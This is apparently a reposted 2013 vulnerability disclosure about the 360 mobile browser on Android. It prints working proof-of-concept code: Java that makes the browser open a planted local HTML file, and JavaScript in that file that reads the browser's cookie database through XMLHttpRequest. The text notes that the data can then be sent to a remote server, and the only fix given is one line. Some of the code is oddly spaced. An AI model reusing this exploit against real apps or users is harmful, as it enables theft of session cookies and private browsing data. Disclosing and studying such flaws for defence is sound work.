360 mobile browser defects can cause leakage of user sensitive data

Source: Internet
Author: User

When an attack app (both malicious and non-malicious) sends a request to the 360 browser to open a local page, on this local page, you can obtain all the data in the 360 browser according to the attack app requirements, including cookie information. The stealing process does not require the root user. After stealing, you can send the data to a remote server!
Android platform 360 mobile browser MD5: 5b252a142a492b34bd3253acb51882bd September 22, 2013

CopyFile (); // customizable, release filehe.html to the SD card String url = "file: // mnt/sdcard/filehe.html"; Intent contIntent = new Intent (); contIntent. setAction ("android. intent. action. VIEW "); contIntent. setData (Uri. parse (url); Intent intent = new Intent (); intent. setClassName ("com. qihoo. browser "," com. qihoo. browser. browserActivity "); intent. setAction ("android. intent. action. VIEW "); intent. setData (Uri. parse (url); this. startActivity (intent );

 

The filehe.html file that obtains critical information:
Function getDatabase () {var request = false; if (window. XMLHttpRequest) {request = new XMLHttpRequest (); if (request. overrideMimeType) {request. overrideMimeType ('text/xml') ;}} xmlhttp = request; var prefix = "file: // data/com. qihoo. browser/databases "; var postfix ="/webviewCookiesChromium. db "; // retrieve the dbvar path = prefix that saves the cookie. concat (postfix); // get the local file code xmlhttp. open ("GET", path, false); xmlhttp. send (null); var ret = xmlhttp. responseText; return ret ;}

 

Solution:Restrict access to file Domains

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.